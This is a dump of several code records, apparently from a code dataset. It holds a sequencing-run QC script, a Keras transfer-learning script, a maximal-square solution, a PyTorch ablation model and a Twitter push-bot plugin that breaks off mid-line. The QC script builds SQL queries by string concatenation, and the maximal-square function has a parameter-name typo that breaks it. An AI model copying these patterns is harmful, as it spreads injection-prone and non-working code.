quality over the read\n Q30_median_over_cycle_r2_xdata = (np.arange(1,(len(Q30_median_over_cycle_r2)+1))) # Want it to start at 1 and stop at 101\n #Fit a curve to the data\n #function to fit- make it non-linear\n #Initial guesses for parameters- already above for r1, function also already defined above\n #This requires a function as input\n optimal_vals_Q30_r2, covar_Q30_r2 = curve_fit(func,Q30_median_over_cycle_r2_xdata,Q30_median_over_cycle_r2, p0=(p1,p2))\n linear_pred_r2 = (optimal_vals_Q30_r2[0] * Q30_median_over_cycle_r2_xdata + optimal_vals_Q30_r2[1])\n\n #Print out the slope of the line\n slope_Q30_r2 = optimal_vals_Q30_r2[0]\n #print(slope_Q30_r2)\n\n if abs(slope_Q30_r2) > 0.0005:\n #warnings.warn(\"Big drop in quality towards the end of read 2\")\n print(\"Big drop in quality towards the end of read 2\")\n\n '''\n #Create a nice illustrative plot- remember this isn't going to give any information at all about individual outliers, only a worrying trend\n pl.figure(2)\n pl.plot(Q30_median_over_cycle_r2_xdata,Q30_median_over_cycle_r2,'.')\n pl.plot(Q30_median_over_cycle_r2_xdata,linear_pred_r2)\n '''\n\n ##Do the degredation coefficient over r1 and r2 concatenated\n #This is not useful if there is no r2- currently nest within if clause\n #Concatenate the data for r1 and r2\n Q30_median_over_cycle_both = np.concatenate((Q30_median_over_cycle_r1,Q30_median_over_cycle_r2))\n Q30_median_over_cycle_both_xdata = (np.arange(1,(len(Q30_median_over_cycle_both)+1))) # Want it to start at 1 and stop at 101\n #Fit a curve to the data\n #function to fit- make it non-linear\n #Initial guesses for parameters- already above for r1, function also already defined above\n #This requires a function as input\n optimal_vals_Q30_both, covar_Q30_both = curve_fit(func,Q30_median_over_cycle_both_xdata,Q30_median_over_cycle_both, p0=(p1,p2))\n linear_pred_both = (optimal_vals_Q30_both[0] * Q30_median_over_cycle_both_xdata + optimal_vals_Q30_both[1])\n\n #Print out the slope of the line\n slope_Q30_both = optimal_vals_Q30_both[0]\n #print(slope_Q30_both)\n\n if abs(slope_Q30_both) 
> 0.0005:\n #warnings.warn(\"Big drop in quality towards the end of both of the reads\")\n print(\"Big drop in quality towards the end of both of the reads\")\n \n '''\n #Create a nice illustrative plot- remember this isn't going to give any information at all about individual outliers, only a worrying trend\n pl.figure(3)\n pl.plot(Q30_median_over_cycle_both_xdata,Q30_median_over_cycle_both,'.')\n pl.plot(Q30_median_over_cycle_both_xdata,linear_pred_both)\n '''\n \n '''Removed plot for now\n pl.plot(Q30_median_over_cycle_r2)\n pl.show()\n '''\n\n '''\n #Is this the same data as before (right up near the data extract)\n print(prop_Q30_r1)\n print(proportion_Q30_r1)\n print(np.mean(proportion_Q30_r1))\n print(prop_Q30_r2)\n print(proportion_Q30_r2)\n print(np.mean(proportion_Q30_r2))\n '''\n\n #Intensity over cycle information- means over all tiles- NOT ACTALLY USING THIS ATM\n cursor.execute(\"\"\" SELECT CycleID, Intensity_A, Intensity_C, Intensity_G, Intensity_T\n FROM ExtractionMetrics\n WHERE ExtractionMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\" \"\"\"\n ORDER BY ExtractionMetrics.MiSeqRunID, ExtractionMetrics.CycleID \"\"\")\n intensity_cycles = cursor.fetchall()\n #print(\"Intensity for each base over cycle Retrieved\")\n intensity_cycles_arr = np.asarray(intensity_cycles)\n #print(intensity_cycles_arr)\n #print(intensity_cycles_arr[:,0]) #cycle\n int_A_cycles = []\n int_C_cycles = []\n int_G_cycles = []\n int_T_cycles = []\n #Chunk this up into segments on cycle as before\n for int_i,int_cycle in enumerate(intensity_cycles_arr[:,0][::(num_tls*num_surfaces)]):\n #print(int_cycle)\n int_chunk = (intensity_cycles_arr[:,:][(int_i*(num_tls*num_surfaces)):((int_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n #print(int_chunk)\n #print(np.sum(int_chunk))\n int_A_cycles.append(np.mean(int_chunk[:,1]))\n int_C_cycles.append(np.mean(int_chunk[:,2]))\n int_G_cycles.append(np.mean(int_chunk[:,3]))\n int_T_cycles.append(np.mean(int_chunk[:,4]))\n #print(int_A_cycles)\n #print(int_C_cycles)\n #print(int_G_cycles)\n #print(int_T_cycles)\n #print(intensity_cycles_arr[:,0][::(num_tls*num_surfaces)]) # All cycle numbers once in an array\n\n #Removing the index reads and splitting into r1 and r2\n int_A_cycles_r1 = int_A_cycles[0:read1_length]\n int_A_cycles_r2 = int_A_cycles[(read1_length+ind_reads):(read1_length+ind_reads)+read2_length]\n int_C_cycles_r1 = int_C_cycles[0:read1_length]\n int_C_cycles_r2 = int_C_cycles[(read1_length+ind_reads):(read1_length+ind_reads)+read2_length]\n int_G_cycles_r1 = int_G_cycles[0:read1_length]\n int_G_cycles_r2 = int_G_cycles[(read1_length+ind_reads):(read1_length+ind_reads)+read2_length]\n int_T_cycles_r1 = int_T_cycles[0:read1_length]\n int_T_cycles_r2 = int_T_cycles[(read1_length+ind_reads):(read1_length+ind_reads)+read2_length]\n\n\n #Indexing- different proportion of reads?\n cursor.execute(\"\"\" SELECT * FROM IndexMetricsMSR\n WHERE IndexMetricsMSR.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\" \"\"\"\n ORDER By IndexMetricsMSR.IndexName \"\"\")\n index_metrics = cursor.fetchall() #[0][0]\n index_metrics_arr = np.asarray(index_metrics) \n \n if len(index_metrics_arr) == 0:\n #warnings.warn(\"No index information for run \" + str(run_for_import))\n print(\"No index information for run \" + str(run_for_import))\n continue #Continue with the next interation of the loop \n \n #Note that this is sorted by Index Name and therefore chunks of 28 (as before with the quality by cycle)\n #(numtiles*numsurfaces) correspond to each index\n 
#print(index_metrics_arr)\n #print(index_metrics_arr[:,5])\n total_per_index = []\n for inde_i,inde in enumerate(index_metrics_arr[:,5][::(num_tls*num_surfaces)]):\n index_chunk = (index_metrics_arr[:,5][(inde_i*(num_tls*num_surfaces)):((inde_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n #print(index_chunk) #Tested correct with full index_metrics_arr (rather than just value)\n #Convert array to a numerical type- needed to exclude runid before doing this\n index_chunk_int = np.ndarray.astype(index_chunk,int)\n total_per_index.append(np.sum(index_chunk_int))\n #print(\"Next\") #See above\n\n #print(index_metrics_arr[:,4][::(num_tls*num_surfaces)])\n\n #Obtain the total number of counts per sample (over all tiles) and then this as a proportion of total number\n #passing filter (which includes undetermined reads)\n total_per_index_arr = np.asarray(total_per_index)\n #print(total_per_index_arr)\n #print(reads_per_run_pf)\n prop_pf_per_index_arr = ((total_per_index_arr)/(float(reads_per_run_pf)*100)) # Integer division gives 0\n #print(prop_pf_per_index_arr)\n #print(np.sum(total_per_index_arr))\n ## This will enable (divided by the number of reads passing filter)- to get %reads identified (PF) from Indexing page of SAV\n #print(100*(np.sum(total_per_index_arr)/float(reads_per_run_pf))) #Note avoiding integer division = 0 again\n\n #Either/Or for labelling\n sample_names = index_metrics_arr[:,6][::(num_tls*num_surfaces)] \n #Set the index names to the sequence of the indices\n #index_names = index_metrics_arr[:,4][::(num_tls*num_surfaces)] \n #Set the index names to the name of the sample\n index_names = sample_names\n\n index_x_axis = np.arange(len(index_names)) #This is required for the later setting of xticks to labels\n\n ##Before deciding on the outlying samples, the NTC should be removed as it is a special case\n #It would still be good if it appeared on the plot though- this has been achieved\n location_of_ntc = []\n for samp_ind,samp in enumerate(sample_names):\n #find_ntc = re.compile(\"NTC\") # This syntax could be useful for later\n '''\n print(samp)\n matches = re.findall(\"NTC\", samp)\n mat = re.match(\"NTC\", samp)\n se = re.search(\"NTC\", samp)\n print(matches)\n print(mat)\n print(se)\n '''\n if re.search(\"ntc\", samp, re.IGNORECASE):\n '''\n Find the NTC and remove it from the list of outlying samples, leaving only the samples\n which are over or under represented\n This version assumed that there was one NTC, amended to handle the case where there\n is more than one\n '''\n #print(samp)\n #print(samp_ind)\n #print(prop_pf_per_index_arr[samp_ind])\n #print(prop_pf_per_index_arr[0:samp_ind])\n #print(prop_pf_per_index_arr[(samp_ind+1):len(prop_pf_per_index_arr)])\n #Remove the NTC which will skew the data\n '''\n prop_pf_index_subs_arr = (np.concatenate((prop_pf_per_index_arr[0:samp_ind],prop_pf_per_index_arr[(samp_ind+1):len(prop_pf_per_index_arr)])))\n sample_names_subs = (np.concatenate((sample_names[0:samp_ind],sample_names[(samp_ind+1):len(sample_names)])))\n #Need to handle the case where there is >1 NTC\n location_of_ntc.append(samp_ind)\n n = samp_ind\n '''\n location_of_ntc.append(samp_ind)\n \n #else:\n #print(samp)\n # Only want to put these into the mean etc as the NTC should be treated as a special case\n\n #Create an array containing the NTC entries only\n #print(location_of_ntc)\n #location_of_ntc = [8,10] # This was for testing purposes: checking it worked if had more than 1 NTC\n prop_pf_index_ntc_arr = prop_pf_per_index_arr[location_of_ntc]\n 
sample_names_ntc = sample_names[location_of_ntc]\n #print(sample_names_ntc)\n #print(prop_pf_index_ntc_arr)\n ntc_arr = np.vstack((sample_names_ntc,prop_pf_index_ntc_arr)).T\n #print(ntc_arr) #Sample name and value in a 2D array\n \n #Create an array containing all the entries except the NTC ones \n prop_pf_index_subs_arr = np.delete(prop_pf_per_index_arr,location_of_ntc)\n sample_names_subs = np.delete(sample_names,location_of_ntc)\n not_ntc_arr = np.vstack((sample_names_subs,prop_pf_index_subs_arr)).T\n #print(not_ntc_arr) #Sample name and value in a 2D array\n\n #print(prop_pf_per_index_arr)\n #print(prop_pf_index_subs_arr)\n ind_mean = (np.mean(prop_pf_index_subs_arr))\n #print(ind_mean)\n ind_std = (np.std(prop_pf_index_subs_arr))\n #print(ind_std)\n ind_high_threshold = (ind_mean + (2*ind_std))\n ind_low_threshold = (ind_mean - (2*ind_std))\n\n #Change threshold for testing purposes\n #ind_high_threshold = 5\n\n #print(np.where(prop_pf_per_index_arr > ind_high_threshold))\n #print(np.where(prop_pf_per_index_arr < ind_low_threshold))\n\n outlying_indexes = (np.where((prop_pf_index_subs_arr < ind_low_threshold) | (prop_pf_index_subs_arr > ind_high_threshold)))\n #print(outlying_indexes)\n #print(outlying_indexes[0])\n outlying_sample_indexes = (sample_names_subs[outlying_indexes[0]])\n #print(outlying_sample_indexes) #Checked correct against SAV\n #print(prop_pf_index_subs_arr[outlying_indexes[0]]) #This is the percentage of it\n #Concatenate the sample name and its value for later readout in a numpy array\n outlying_samples_values_arr = np.vstack((outlying_sample_indexes,prop_pf_index_subs_arr[outlying_indexes[0]])).T\n\n #np.savetxt(\"C:\\Users\\Sara\\Dropbox\\Bioinformatics Clinical Science\\MScProject\\PlayingWithExcelData\\LookatMe.csv\",arre, delimiter=\",\", fmt=\"%s\")\n #outlying_sample_indexes = [] #Test for correct triggering of if clause below\n #print(np.where(outlying_sample_indexes != \"NTC_15-13654\"))\n\n #Coefficient of variation\n #print(ind_std)\n #print(ind_mean)\n index_COV = (ind_std/ind_mean)\n #print(index_COV)\n\n threshold_index_COV = 0.03 # Set to 3% otherwise very low samples won't trigger this (known because of COV value including NTC below)\n # This is way too sensitive at the moment (Matt suggests 5%)\n\n if index_COV > threshold_index_COV:\n #warnings.warn(\"Big range over different sample indices\") # Note that NTCs are excluded by this code\n print(\"Big range over different sample indices\")\n\n '''\n #Work out COV including NTC- to see if matches Illumina's calculation\n ind_std_2 = np.std(prop_pf_per_index_arr)*100\n ind_mean_2 = np.mean(prop_pf_per_index_arr)*100\n index_COV_2 = (ind_std_2/ind_mean_2)\n print(np.min(prop_pf_per_index_arr))\n print(np.max(prop_pf_per_index_arr))\n print(index_COV_2) # This should be 0.4775 and comes out as 0.455\n '''\n\n if (len(outlying_indexes[0])) > 0:\n '''\n NEED TO WORK ON HOW TO PRESENT THIS DATA TO THE USER!! 
Also this is slightly redundant with the COV- but threshold is at 5% there, so this is more sensitive\n '''\n #warnings.warn(\"There is at least one outlying sample\")\n print(\"There is at least one outlying sample\")\n #print(outlying_samples_values_arr)\n low_num_reads_ind = (np.where(outlying_samples_values_arr[:,1] < ind_low_threshold))[0]\n #print(low_num_reads) #The index at which the low number of reads are found\n low_num_reads = (outlying_samples_values_arr[low_num_reads_ind,:])\n #print(low_num_reads) #The samples with proportions less than the low threshold in an array\n high_num_reads_ind = (np.where(outlying_samples_values_arr[:,1] > ind_high_threshold))[0]\n high_num_reads = (outlying_samples_values_arr[high_num_reads_ind,:])\n #print(high_num_reads) #The samples with proportions higher than the high threshold in an array\n '''\n if outlying_samples_values_arr[0][1] < ind_low_threshold:\n print(\"One sample has a very low number of reads\")\n '''\n\n #Is the NTC elevated above baseline (i.e. is there contamination in the run?)\n NTC_threshold = 1.0\n '''\n print(ntc_arr)\n print(ntc_arr[:,1])\n print(prop_pf_index_ntc_arr)\n print(prop_pf_index_ntc_arr.any())\n '''\n\n if (len(np.where(prop_pf_index_ntc_arr > NTC_threshold)[0])) > 0: #If there is an entry in the array of the where\n #warnings.warn(\"NTC has a higher than expected proportion of reads\")\n print(\"NTC has a higher than expected proportion of reads\")\n\n '''\n print(location_of_ntc)\n print((sample_names[location_of_ntc],prop_pf_per_index_arr[location_of_ntc]))\n print((sample_names[n],prop_pf_per_index_arr[n]))\n print(ind_low_threshold)\n #if prop_pf_per_index_arr[location_of_ntc] > 0.5:\n #warnings.warn(\"NTC has a higher than expected proportion of reads\")\n '''\n\n #pl.show()\n \n '''\n #Plot all the different indexes (all together)\n fig1 = pl.figure(1)\n ax1 = fig1.add_subplot(1,1,1) # one row, one column, first plot\n pl.xticks(index_x_axis,index_names)\n ax1.scatter(index_x_axis,prop_pf_per_index_arr)\n ax1.set_xlabel(\"Index\")\n pl.show()\n '''\n '''\n #Plot intensity over cycle\n fig2 = pl.figure(2)\n #pl.plot((intensity_cycles_arr[:,0][::(num_tls*num_surfaces)]),int_A_cycles)\n pl.plot(int_A_cycles_r1)\n pl.plot(int_C_cycles_r1)\n pl.plot(int_G_cycles_r1)\n pl.plot(int_T_cycles_r1)\n\n fig3 = pl.figure(3)\n pl.plot(int_A_cycles_r2)\n pl.plot(int_C_cycles_r2)\n pl.plot(int_G_cycles_r2)\n pl.plot(int_T_cycles_r2)\n\n pl.show()\n '''\n\n '''\n pl.figure(11)\n f2 = pl.plot(proportion_Q30_r1)\n\n pl.figure(12)\n f3 = pl.plot(proportion_Q30_r2)\n\n pl.show()\n '''\n '''\n #Concatenate the arrays to get the same plot as the original data extract to double-check\n proportion_Q30_rboth = np.concatenate((proportion_Q30_r1,proportion_Q30_r2))\n pl.figure(13)\n f4 = pl.plot(proportion_Q30_rboth)\n\n\n #Do the median plots\n pl.figure(14)\n f5 = pl.plot(r1_qual_med)\n\n pl.figure(15)\n f6 = pl.plot(r2_qual_med)\n\n rboth_qual_med = np.concatenate((r1_qual_med,r2_qual_med))\n #print(len(rboth_qual_med)) #Correct length of 202 in this example, with reads of 101 cycles length\n pl.figure(16)\n f4 = pl.plot(rboth_qual_med)\n\n\n pl.show()\n '''\n\n#Does it look how one would expect?\n\n#Close the files?\n#file_of_runs.close()\n","sub_path":"RunQC/src/RunQCMultiTestingMod.py","file_name":"RunQCMultiTestingMod.py","file_ext":"py","file_size_in_byte":64761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
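The run-QC script above keeps re-deriving the same two summaries from binned quality counts: the fraction of bases at Q30 or better, and a per-cycle median Q score dug out of cumulative bin counts. Below is a minimal numpy sketch of both (my own illustration, not code from the source); it assumes a rows-by-50 count array laid out Q1..Q50, matching the column-29 slicing the script uses.

import numpy as np

def q30_proportion(qual_counts):
    # Columns 0..49 hold counts for Q1..Q50, so Q30 starts at column index 29.
    total = qual_counts.sum()
    return qual_counts[:, 29:].sum() / float(total) if total else 0.0

def binned_median_q(qual_counts):
    # Collapse all tiles/cycles into one histogram over Q1..Q50, then find the
    # first bin whose cumulative count reaches half the total; +1 maps the
    # 0-based column index back to a Q score.
    cum = np.cumsum(qual_counts.sum(axis=0))
    return int(np.searchsorted(cum, cum[-1] / 2.0)) + 1

counts = np.zeros((4, 50), dtype=int)
counts[:, 34] = 100                      # every base lands in the Q35 bin
assert q30_proportion(counts) == 1.0 and binned_median_q(counts) == 35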
+{"seq_id":"474585886","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, BatchNormalization, Activation\nfrom tensorflow.keras.layers import Conv2D, MaxPool2D, GlobalAveragePooling2D\nfrom tensorflow.keras.optimizers import RMSprop, Adam\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom pcam_utils import plot_figures, load_norm_data\nfrom tensorflow.keras import metrics\nfrom sklearn.metrics import roc_curve, auc\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport logging\n\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3\n\n# written by Eric Bonnet 03.2020\n# eric.d.bonnet@gmail.com\n# transfer learning and full Inception re-training model for the pcam dataset\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level = logging.INFO)\n\nlogging.info(\"loading data\")\n(x_train, x_valid, x_test, y_train, y_valid, y_test) = load_norm_data()\n\n# Hyper parameters\nnb_epochs = 10 \nbatch_size = 64 \nnb_dense_layers = 256\ndata_augmentation = False \n\nprint(\"nb epochs: \"+str(nb_epochs))\nprint(\"batch size: \"+str(batch_size))\nprint(\"nb dense layers: \"+str(nb_dense_layers))\nprint(\"data augmentation: \"+str(data_augmentation))\n\nif data_augmentation == True:\n\n train_datagen = ImageDataGenerator(\n rotation_range = 40,\n width_shift_range = 0.2,\n height_shift_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True,\n vertical_flip = True,\n fill_mode = 'nearest')\n\n train_generator = train_datagen.flow(x_train, y_train, batch_size = batch_size)\n\n# create the base pre-trained model\nbase_model = InceptionV3(weights='imagenet', include_top=False)\n\n# add a global spatial average pooling layer\nx = base_model.output\nx = GlobalAveragePooling2D()(x)\n\n# let's add a fully-connected layer\nx = Dense(nb_dense_layers, activation='relu')(x)\npredictions = Dense(1, activation='sigmoid')(x)\nmodel = Model(inputs=base_model.input, outputs=predictions)\n\n# first: train only the top layers (which were randomly initialized)\n# i.e. 
freeze all convolutional InceptionV3 layers\n# if this value is set to True, the model will be fully re-trained on the dataset\nfor layer in base_model.layers:\n layer.trainable = False \n\n# set checkpointing\ncheckpoint_path = \"pcam_weights.h5\"\ncheckpoint = ModelCheckpoint(checkpoint_path, monitor='val_accuracy', verbose=1, save_best_only=True, save_weights_only=True, mode='max')\ncallbacks_list = [checkpoint]\n\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n\nprint(model.summary())\nprint(\"nb layers: \"+str(len(model.layers)))\n\nlogging.info(\"training model\")\n\nif data_augmentation == False:\n history = model.fit(x_train, y_train, validation_data=(x_valid, y_valid), epochs=nb_epochs, batch_size=batch_size, verbose=1, callbacks=callbacks_list)\nelse:\n steps_per_epoch = x_train.shape[0] // batch_size\n print(\"steps_per_epoch: \"+str(steps_per_epoch))\n history = model.fit_generator(train_generator, \n steps_per_epoch = steps_per_epoch, \n epochs = nb_epochs, \n verbose=1 , \n validation_data = (x_valid, y_valid), \n callbacks = callbacks_list)\n\nlogging.info(\"training done\")\n\n# load best weights\nmodel.load_weights(checkpoint_path)\n\nlogging.info(\"evaluate model\")\n\n# calculate loss and accuracy on test set\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss: '+str(score[0]))\nprint('Test accuracy: '+str(score[1]))\n\n# calculate false positive rate, true positive rate, roc area under the curve and plot figures\ny_pred = model.predict(x_test)\nfpr, tpr, _ = roc_curve(y_test, y_pred)\nroc_auc = auc(fpr, tpr)\nprint(\"ROC auc: \"+str(roc_auc))\n\nlogging.info(\"plotting figures\")\n\nplot_figures(fpr, tpr, history, roc_auc, \"roc.png\", \"loss.png\", \"accuracy.png\")\n\n\n","sub_path":"legacy_code/code/tensorflow2.1/03_transfer_learning.py","file_name":"03_transfer_learning.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
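The script above trains only the randomly initialised top while every InceptionV3 layer stays frozen, and its comment notes full retraining as the alternative. A common middle ground is a second phase that unfreezes just the top Inception blocks at a much lower learning rate. The sketch below is an assumption, not part of the source: it reuses the script's model and data variables, and the cut-off index 249 is borrowed from the Keras InceptionV3 fine-tuning example.

from tensorflow.keras.optimizers import Adam

for layer in model.layers[:249]:
    layer.trainable = False
for layer in model.layers[249:]:
    layer.trainable = True

# Recompiling is required for trainability changes to take effect.
model.compile(loss="binary_crossentropy", optimizer=Adam(learning_rate=1e-5), metrics=["accuracy"])
model.fit(x_train, y_train, validation_data=(x_valid, y_valid), epochs=nb_epochs, batch_size=batch_size, verbose=1, callbacks=callbacks_list)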
+{"seq_id":"234038185","text":"\n#221 最大正方形\ndef maximalSquare(atrix):\n if not matrix or len(matrix[0])==0:return 0\n row = len(matrix)+1\n col = len(matrix[0])+1\n dp = [[0]*col for _ in range(row)]\n maxSize = 0\n for r in range(row-1):\n for c in range(col-1):\n if matrix[r][c] =='1':\n dp[r+1][c+1] = min(dp[r][c],dp[r+1][c],dp[r][c+1]) +1\n maxSize = max(maxSize,dp[r+1][c+1])\n return maxSize*maxSize\n","sub_path":"Week_06/maximal_square.py","file_name":"maximal_square.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"404616853","text":"\nimport torch\nimport torch.nn as nn\nimport torch.legacy.nn as lnn\n\nfrom functools import reduce\nfrom torch.autograd import Variable\n\nfrom src.models import completionnet_places2\n\n# This was obtained from https://github.com/clcarwin/convert_torch_to_pytorch\ncompletionnet_ablation = lambda x: nn.Sequential( # Sequential,\n\tnn.Conv2d(4,64,(5, 5),(1, 1),(2, 2)),\n\tnn.BatchNorm2d(64),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(64,128,(3, 3),(2, 2),(1, 1)),\n\tnn.BatchNorm2d(128),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(128,128,(3, 3),(1, 1),(1, 1)),\n\tnn.BatchNorm2d(128),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(128,256,(3, 3),(2, 2),(1, 1)),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),(1, 1),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),(1, 1),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(2, 2),(2, 2),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(4, 4),(4, 4),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(8, 8),(8, 8),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(16, 16),(16, 16),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),(1, 1),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),(1, 1),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.ConvTranspose2d(256,128,(4, 4),(2, 2),(1, 1),(0, 0)),\n\tnn.BatchNorm2d(128),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(128,128,(3, 3),(1, 1),(1, 1)),\n\tnn.BatchNorm2d(128),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.ConvTranspose2d(128,64,(4, 4),(2, 2),(1, 1),(0, 0)),\n\tnn.BatchNorm2d(64),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(64,32,(3, 3),(1, 1),(1, 1)),\n\tnn.BatchNorm2d(32),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(32,3,(3, 3),(1, 1),(1, 1)),\n\tnn.Sigmoid(),\n)\n\ndef copy_weights(A, B):\n weights = []\n for i, m in enumerate(A.modules()):\n if i == 0:\n continue\n if hasattr(m, 'weight'):\n weights.append(m.weight)\n j = 0\n for i, m in enumerate(B.modules()):\n if i == 0:\n continue\n if hasattr(m, 'weight'):\n m.weight = weights[j]\n j += 1\n\nif __name__ == \"__main__\":\n A = completionnet_places2\n A.load_state_dict(torch.load('completionnet_places2.pth'))\n B = completionnet_ablation(0.1)\n copy_weights(A, B)\n B.eval()\n for m in B.modules():\n if m.__class__.__name__.startswith('Dropout'):\n m.train()\n","sub_path":"ImagerieNumerique/src/ablation.py","file_name":"ablation.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"494508322","text":"import module.twitter as tweetListener\nfrom nonebot import on_command, CommandSession, permission\nfrom helper import commandHeadtail\nfrom tweepy import TweepError\nimport time\nimport asyncio\nimport os\nimport traceback\nimport re\n#推送列表的引用\npush_list : tweetListener.PushList = tweetListener.push_list\n\n\n# on_command 装饰器将函数声明为一个命令处理器\n@on_command('addtest', permission=permission.SUPERUSER,only_to_me = False)\nasync def addtest(session: CommandSession):\n message_type = session.event['message_type']\n sent_id = 0\n if message_type == 'private':\n sent_id = session.event['user_id']\n elif message_type == 'group':\n sent_id = session.event['group_id']\n else:\n await session.send('未收录的消息类型:'+message_type)\n return\n sent_id = str(sent_id)\n unit = push_list.baleToPushUnit(\n 1837730674,\n message_type,sent_id,805435112259096576,\n '增删测试',nick='底层轴man',none_template=\"$tweet_nick这个人发推了,爪巴\")\n push_list.addPushunit(unit)\n await session.send('done!')\n@on_command('deltest', permission=permission.SUPERUSER,only_to_me = False)\nasync def deltest(session: CommandSession):\n message_type = session.event['message_type']\n sent_id = 0\n if message_type == 'private':\n sent_id = session.event['user_id']\n elif message_type == 'group':\n sent_id = session.event['group_id']\n else:\n await session.send('未收录的消息类型:'+message_type)\n return\n sent_id = str(sent_id)\n s = push_list.delPushunitFromPushToAndTweetUserID(message_type,sent_id,805435112259096576)\n await session.send(s)\n\n@on_command('delall',aliases=['这里单推bot'], permission=permission.SUPERUSER,only_to_me = True)\nasync def delalltest(session: CommandSession):\n message_type = session.event['message_type']\n sent_id = 0\n if message_type == 'private':\n sent_id = session.event['user_id']\n elif message_type == 'group':\n sent_id = session.event['group_id']\n else:\n await session.send('未收录的消息类型:'+message_type)\n return\n sent_id = str(sent_id)\n push_list.delPushunitFromPushTo(message_type,sent_id)\n await session.send('已移除此地所有监测')\n\n\n#获取指定推送对象的推送列表(推送标识,推送对象ID)\ndef get_pushTo_spylist(message_type:str,pushTo:int):\n if message_type not in push_list.message_type_list:\n raise Exception(\"无效的消息类型!\",message_type)\n table = push_list.getLitsFromPushTo(message_type,pushTo)\n s = ''\n unit_cout = 0\n for key in table:\n unit_cout = unit_cout + 1\n s = s + (table[key]['nick'] if table[key]['nick'] != '' else tweetListener.myStreamListener.tryGetNick(key,\"未定义昵称\")) + \\\n \",\" + str(key) + ',' + table[key]['des'] + \"\\n\"\n s = s + '总监测数:' + str(unit_cout)\n if unit_cout == 0:\n s = s + '\\n' + '单 推 b o t'\n return s\n@on_command('getpushlist',aliases=['DD列表'],only_to_me = False)\nasync def getpushlist(session: CommandSession):\n message_type = session.event['message_type']\n sent_id = 0\n if message_type == 'private':\n sent_id = session.event['user_id']\n elif message_type == 'group':\n sent_id = session.event['group_id']\n else:\n await session.send('未收录的消息类型:'+message_type)\n return\n s = get_pushTo_spylist(message_type,sent_id)\n await session.send(s)\n\n@on_command('getuserinfo',aliases=['查询推特用户'],permission=permission.SUPERUSER,only_to_me = True)\nasync def getuserinfo(session: CommandSession):\n stripped_arg = session.current_arg_text.strip()\n if stripped_arg == '':\n return\n try:\n if stripped_arg.isdecimal():\n userinfo = tweetListener.api.get_user(user_id = int(stripped_arg))\n else:\n userinfo = tweetListener.api.get_user(screen_name = stripped_arg)\n except TweepError:\n s = 
traceback.format_exc(limit=5)\n tweetListener.log_print(3,'推Py错误'+s)\n await session.send(\"查询不到信息\")\n return\n tweetListener.myStreamListener.seve_image(userinfo.screen_name,userinfo.profile_image_url_https,'userinfo')\n file_suffix = os.path.splitext(userinfo.profile_image_url_https)[1]\n s = '用户UID:'+ str(userinfo.id) + \"\\n\" + \\\n '用户ID:' + userinfo.screen_name + \"\\n\" + \\\n '用户昵称:' + userinfo.name + \"\\n\" + \\\n '头像:' + '[CQ:image,file=userinfo/' + userinfo.screen_name + file_suffix + ']'+ \"\\n\" + \\\n '描述:' + userinfo.description + \"\\n\" + \\\n '推文受保护:' + str(userinfo.protected) + \"\\n\" + \\\n '被关注数:' + str(userinfo.followers_count) + \"\\n\" + \\\n '关注数:' + str(userinfo.friends_count) + \"\\n\" + \\\n '发推数(包括转发):' + str(userinfo.statuses_count) + \"\\n\" + \\\n '账户创建时间:' + str(userinfo.created_at)\n await asyncio.sleep(2.5)\n await session.send(s)\n@on_command('delone',aliases=['我不想D了'],permission=permission.SUPERUSER,only_to_me = True)\nasync def delOne(session: CommandSession):\n stripped_arg = session.current_arg_text.strip()\n if stripped_arg == '':\n await session.send(\"缺少参数\")\n return\n if stripped_arg == re.match('[A-Za-z0-9_]+', stripped_arg, 